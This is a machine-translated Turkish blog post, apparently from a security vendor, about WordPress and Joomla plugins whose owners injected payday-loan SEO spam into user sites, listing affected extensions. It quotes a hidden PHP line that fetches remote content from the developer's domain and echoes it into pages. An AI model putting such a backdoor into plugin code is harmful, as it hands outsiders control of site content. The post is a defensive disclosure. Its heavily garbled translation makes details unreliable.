Yakın zamanda yayınlanan bir makale fazla 900.000 indirme ile çok popüler bir WordPress Plugin (Sosyal Medya Widget), satılan ve yeni sahipleri büyük izleyici kullanımı ve eklenti kullanarak tüm sitelerde istenmeyen enjekte karar var ilginç bir durum hakkında.
Eğer sonrası okursanız, onlar paydaypam.co.uk için bu "ödeme günü kredi" SPAM bağlantılar enjekte hakkında nasıl gittiğini göreceksiniz. Daha da korkutucu bir günde, paydaypam.co.uk için geri sayısını, ahrefs.com göre, 0 neredeyse 450k yükselmiştir olmasıdır:
Bu bir hedef SEO Spam saldırı olabilir ne kadar büyük bir fikir verir.
Spam SEO Joomla sitelerinde Saldırıları
Ne yazık ki, bu hikaye yeni bir şey değil. Okurlarımızın biri sadece birkaç hafta önce Joomla ekosisteminde oldu çok benzer bir durumda bize işaret etti. Benzer şekilde, kampanya 20.000 'den fazla site sızmaya başardı. Dahil geliştiriciler birçok geliyordu popüler Joomla uzantıları :
iNowWeb.com (yazar: Şerif Memduh):
- Joomla için AddThis
- Joomla için bu paylaş!
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- Joomla BrainyQuote! (Mod_JoomlaBrainyQuote)
- Kelime ile Tırnaklar! (Mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- Joomla QuickJump! (Mod_quickjump)Autson.com (yazar: XING):
- VirtueMart Gelişmiş Arama
- sıçramak Slayt
- FaceBook Slider
- Twitter Friends & İzleyiciler
- Uçan Tweets
- Autson Twitter Arama
- Twitter Alıntı
- FaceBook gösterPlimun.com:
- Plimun Twitter Ticker
- Twitter göster
- Nivo Slider
Bu adamlar kendi uzantısı çalışan [s]. Herhangi bir site içine SPAM seo (gün kredi ödeme) aynı tür enjekte kendi kullanıcı tabanı kaldıraç çalıştı Bu durumda, gizli geri gelen çağrılan edilmiştir:
$ Kredi = file_get_contents ("httx :/ / www.inowweb com / p.php i =.?" $ Yolu.);
$ kredi echo;
Bu uzatma geliştiriciler kontrol ve yazılımı kullanarak herhangi bir sitede görüntülenecek ne seçmek için izin verdi. Joomla güvenlik ekibi aynı zamanda hızlı tepki ve bu geliştiriciler ve ilgili uzantıları yasakladı.
Eklenti kullanımı kısıtlama
Bir süre bu konuda söz edilmiş, ama tekrar önemlidir. Tüm diğer üçüncü parti bileşenleri ile birlikte, uzantıları (veya eklentileri), kullanım sınırlamak ve yalnızca güvenilir kaynaklardan kullanın. Daha da önemlisi, söz konusu işlevi gerek sadece. Eğer ortamınızda yapılandırmış az eklentileri, az şansını benzer bir durumda yakalanmış gerekir. Istediğiniz son şey bir SPAM botnet parçası olmaktır.
Sitenizde bu spam anahtar kelimeler gösteriyor eğer emin değilseniz, burada ücretsiz olarak tarayabilir:http://sitecheck.sucuri.net
Hiç yorum yok:
Yorum Gönder